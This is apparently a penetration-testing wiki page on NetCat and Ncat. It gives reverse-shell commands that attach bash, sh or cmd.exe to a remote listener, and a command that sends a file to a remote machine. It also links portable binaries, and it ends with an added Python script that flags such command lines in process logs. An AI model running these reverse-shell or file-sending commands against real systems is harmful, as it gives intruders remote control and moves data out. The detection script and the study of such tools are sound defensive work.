====== NetCat (nc) ======

NetCat is a popular **remote access tool.**

  * It has a small footprint so it's portable.
  * It can set up a reverse shell easily...

Local listener for reverse shell:

  nc -nvlp [port number]
  # -n numeric-only IP addresses, no DNS
  # -v verbose (twice for more verbose)
  # -l listen mode, for inbound connects
  # -p port number

Connect to that listener:

  # For Linux (either or):
  nc [listener IP] [port] -e /bin/bash
  nc [listener IP] [port] -e /bin/sh
  # For Windows:
  nc.exe [listener IP] [port] -e cmd.exe

Connect to FTP port (21) to check version of FTP server:

  nc [target IP] 21

Send output from a listener to a text file:

  nc -nvlp [port number] > filename.txt

Send output from a text file to a remote machine:

  nc [IP Address] [port] < filename.txt

----

===== NetCat Download =====

==== Simple & Easy ====

**Initial:** {{ :downloads:netcat-win32-1.11.zip | netcat 1.11 }} compiled for both 32 and 64-bit Windows.

**Update:** {{ :downloads:netcat-win32-1.12.zip | netcat 1.12 }} adds ''-c'' command-line option to send CRLF line endings instead of just CR (e.g. to talk to Exchange SMTP)

I used 1.12 on Windows 7 and it was drop-and-use.

  * Dropped the zip into Winders, unzipped, reverse shell back to my Kali box.
  * No tweaking necessary.

**Source**: [[https://eternallybored.org/misc/netcat/ | eternallybored.org]] (much thanks)

----

====== Ncat ======

[[https://nmap.org/ncat/ | Ncat]] is a much-improved reimplementation of Netcat.

  * It has a variety of different capabilities...
    * SSL
    * Proxies
    * SendMail
    * Chain together Ncat sessions for pivoting.

If you need a statically compiled version of ncat.exe that you can just drop on a Windows system and use without having to run any installer or copy over extra library files: [[https://nmap.org/dist/ncat-portable-5.59BETA1.zip | Ncat 5.59BETA1]] ({{ :downloads:ncat-portable-5.59beta1.zip | local download }})

To ensure the file hasn't been tampered with, you can check the [[ https://nmap.org/book/install.html#inst-integrity | cryptographic signatures ]].

If you need a portable version of a newer Ncat release, see the [[ https://secwiki.org/w/Nmap/Ncat_Portable | Ncat portable compilation instructions]].
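
The listener and connect-back command lines in the NetCat section above have a recognisable shape in process-creation logs. The following Python is an added example, not part of the original page or of either tool: it parses a command line the way netcat's short-option clusters work and labels it ''listener'', ''exec'' or ''shell-attached''. The function names, the set of value-taking options (traditional netcat's) and the sample command lines are assumptions constructed for illustration.

```python
import shlex
from pathlib import PureWindowsPath

NC_NAMES = {"nc", "netcat", "ncat"}
VALUE_OPTS = set("egGiopsw")   # short options that take a value in traditional netcat
LONG_OPTS = {"--listen": "l", "--exec": "e", "--sh-exec": "e"}   # Ncat spellings
SHELLS = {"cmd", "powershell", "sh", "bash"}

def _stem(path):
    # PureWindowsPath splits on both "\" and "/", so one helper covers either OS.
    return PureWindowsPath(path.strip('"')).stem.lower()

def classify(cmdline):
    """Return the set of findings for one process-creation command line."""
    argv = shlex.split(cmdline, posix=False)   # posix=False keeps backslashes intact
    if not argv or _stem(argv[0]) not in NC_NAMES:
        return set()
    opts, i = {}, 1
    while i < len(argv):
        arg = argv[i]
        cluster = LONG_OPTS.get(arg, "")
        if not cluster and arg[:1] == "-" and arg[:2] != "--":
            cluster = arg[1:]                  # e.g. "nvlp" from "-nvlp"
        for pos, ch in enumerate(cluster):
            if ch in VALUE_OPTS:
                # Value is the rest of the cluster ("-p4444") or the next argument.
                value = cluster[pos + 1:]
                if not value and i + 1 < len(argv):
                    i += 1
                    value = argv[i]
                opts[ch] = value
                break
            opts[ch] = True
        i += 1
    findings = {"listener"} if "l" in opts else set()
    if "e" in opts:
        findings.add("exec")
        if _stem(opts["e"]) in SHELLS:
            findings.add("shell-attached")
    return findings

# Constructed process command lines (not real telemetry).
SAMPLES = [
    r"C:\Users\Public\nc.exe 192.0.2.10 4444 -e cmd.exe",
    "nc -nvlp 4444",
    "nc 192.0.2.20 21",
    "nc.exe -c 192.0.2.30 25",
]
for sample in SAMPLES:
    print(sorted(classify(sample)), "<-", sample)
```

The short ''-c'' flag is left unflagged because the 1.12 Windows build above uses it for CRLF line endings; other netcat variants give ''-c'' a different meaning, so adjust the mapping to the builds present in your environment.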